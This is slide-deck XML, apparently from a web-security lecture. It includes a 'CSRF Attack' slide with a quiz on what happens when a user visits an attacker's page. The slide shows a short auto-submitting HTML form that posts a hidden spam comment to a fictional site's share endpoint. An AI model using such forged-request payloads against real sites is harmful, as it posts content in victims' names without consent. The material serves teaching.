            <a:endParaRPr sz="1600">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="47"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="1867">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="121917">
              <a:spcBef>
                <a:spcPts val="7"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>text=Feeling</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-40" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>good!</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>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6664" y="450638"/>
            <a:ext cx="3601720" cy="695062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-87" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-47" dirty="0"/>
              <a:t>Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2013713" y="3573271"/>
            <a:ext cx="6191673" cy="307339"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4643755" h="230505">
                <a:moveTo>
                  <a:pt x="4643628" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4643628" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="230124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4643628" y="230124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4643628" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="F1F4FF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="206586" y="1310651"/>
            <a:ext cx="12175613" cy="2565532"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="99907" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="474121" marR="6773" indent="-457189">
              <a:lnSpc>
                <a:spcPts val="3520"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="787"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="473275" algn="l"/>
                <a:tab pos="474121" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr spc="-7" dirty="0"/>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="13" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-27" dirty="0"/>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-27" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-7" dirty="0"/>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-13" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>attacker.com</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-7" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="7" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>creates </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-7" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-13" dirty="0"/>
              <a:t>page</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="7" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-13" dirty="0"/>
              <a:t>containing</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-707" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-13" dirty="0"/>
              <a:t>following</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-7" dirty="0"/>
              <a:t> HTML:</a:t>
            </a:r>
            <a:endParaRPr sz="2667" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="474121">
              <a:lnSpc>
                <a:spcPts val="2140"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;form</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>action</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>"http://ww</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>.gracebook.com/share.php</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="87" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>method</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"post"</a:t>
            </a:r>
            <a:endParaRPr sz="2133" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="474121">
              <a:lnSpc>
                <a:spcPts val="2433"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"f"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2133" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="504601">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="253"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;input</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"hidden"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="47" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"text"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="47" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"SPAM</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>COMMENT"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;&lt;/input&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2133" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="504601">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="260"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>'f'</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>submit</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2133" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223519" y="3838244"/>
            <a:ext cx="10750127" cy="1348938"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="57573" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="456342" indent="-456342">
              <a:spcBef>
                <a:spcPts val="453"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="456342" algn="l"/>
                <a:tab pos="457189" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>What</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>happen</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>when</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the user</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>visits</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the page?</a:t>
            </a:r>
            <a:endParaRPr sz="2667">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="6773">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="608738" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a)	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>spam</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>comment</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> will</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>posted</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>user’s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>share</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>feed</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>gracebook.com </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-579" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>b)</a:t>
            </a:r>
            <a:endParaRPr sz="2667">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="816187" y="4772829"/>
            <a:ext cx="10607887" cy="427532"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>spam</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>comment</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> will</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
